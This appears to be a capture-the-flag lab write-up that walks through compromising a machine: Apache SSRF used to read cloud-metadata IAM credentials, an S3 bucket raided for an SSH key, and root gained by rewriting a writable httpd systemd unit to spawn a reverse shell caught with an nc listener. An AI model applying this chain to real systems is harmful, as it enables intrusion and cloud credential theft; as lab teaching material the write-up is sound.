Published on

IAM Writeup

Authors
logo

Enumeration

curl -I 172.16.10.21

evasion

This Apache version is vulnerable to SSRF.

https://firzen.de/building-a-poc-for-cve-2021-40438

evasion 1

After that, we listed the /latest directory.

evasion 2

Then the /iam directory.

evasion 3

Then inside /security-credentials.

evasion 4

Finally, in MACHINE_IAM_ROLE

evasion 5

With that, we have access to the AWS keys.

evasion 6

Foot Hold

With the credentials, it was possible to log into the application using aws-cli.

export AWS_ACCESS_KEY_ID=
export AWS_SECRET_ACCESS_KEY=
export AWS_SESSION_TOKEN=
evasion 7

Listing the bucket, we can grab the first flag and the SSH key for the op user.

aws s3 ls s3://machine-iam-bucket
aws s3 cp s3://machina-iam-bucket/op-user-key.pem .
evasion 8
chmod 600 op-user-key.pem
ssh op@172.16.10.21 -i op-user-key.pem
evasion 9

Privilege Escalation

sudo -l

We can run httpd and daemon-reload as root without a password.

evasion 10

Looking at the httpd service configuration file, we have write permissions, which we can use to gain root access on the machine.

evasion 11
nano /usr/lib/systemd/system/httpd.service

We modify the ExecStart line to spawn a reverse shell when we restart the service.

evasion 12

After that, just activate the listener and run the command sudo /bin/systemctl restart httpd

nc -lnvp 1337
evasion 13
Discuss on TwitterView on GitHub